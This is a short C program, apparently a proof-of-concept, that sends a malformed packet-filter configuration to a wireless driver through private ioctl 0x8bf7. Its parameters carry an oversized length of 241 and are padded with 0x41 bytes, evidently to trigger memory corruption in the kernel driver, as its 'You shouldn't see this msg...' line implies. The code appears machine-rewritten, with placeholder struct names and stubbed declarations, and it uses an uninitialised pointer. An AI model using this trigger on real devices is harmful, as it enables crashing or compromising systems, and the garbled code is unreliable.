
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_11__ TYPE_5__ ;
typedef struct TYPE_10__ TYPE_4__ ;
typedef struct TYPE_9__ TYPE_3__ ;
typedef struct TYPE_8__ TYPE_2__ ;
typedef struct TYPE_7__ TYPE_1__ ;


typedef int v_U8_t ;
struct TYPE_11__ {int filterAction; int numParams; TYPE_2__* paramsData; scalar_t__ filterId; } ;
typedef TYPE_5__ tPacketFilterCfg ;
struct TYPE_9__ {int pointer; } ;
struct TYPE_10__ {TYPE_3__ data; } ;
struct TYPE_7__ {int ifrn_name; } ;
struct iwreq {TYPE_4__ u; TYPE_1__ ifr_ifrn; } ;
struct PacketFilterParamsCfg {int dummy; } ;
struct TYPE_8__ {int dataLength; int compareData; } ;


 int AF_INET ;
 int SOCK_DGRAM ;
 int errno ;
 int fprintf (int ,char*,...) ;
 int ioctl (int,int,struct iwreq*) ;
 int malloc (int) ;
 int memcpy (int ,TYPE_5__*,int) ;
 int memset (int *,int,int) ;
 int printf (char*) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 int strcpy (int ,char const*) ;
 char* strerror (int ) ;

int main(int argc, const char *argv[])
{
 if (argc != 2) {
  fprintf(stderr, "Bad usage\n");
  fprintf(stderr, "Usage: %s ifname\n", argv[0]);
  return -1;
 }

 struct iwreq req;
 strcpy(req.ifr_ifrn.ifrn_name, argv[1]);
 int fd, status, i = 0;
 fd = socket(AF_INET, SOCK_DGRAM, 0);
 tPacketFilterCfg p_req;


 req.u.data.pointer =
     malloc(sizeof(v_U8_t) * 3 +
     sizeof(struct PacketFilterParamsCfg) * 5);
 p_req.filterAction = 1;
 p_req.filterId = 0;
 p_req.numParams = 3;
 for (; i < 5; i++) {
  p_req.paramsData[i].dataLength = 241;
  memset(&p_req.paramsData[i].compareData, 0x41, 16);
 }

 memcpy(req.u.data.pointer, &p_req,
        sizeof(v_U8_t) * 3 +
        sizeof(struct PacketFilterParamsCfg) * 5);

 if (ioctl(fd, 0x8bf7, &req) == -1) {
  fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
   argv[1], strerror(errno));
 } else {
  printf("You shouldn't see this msg...\n");
 }

}
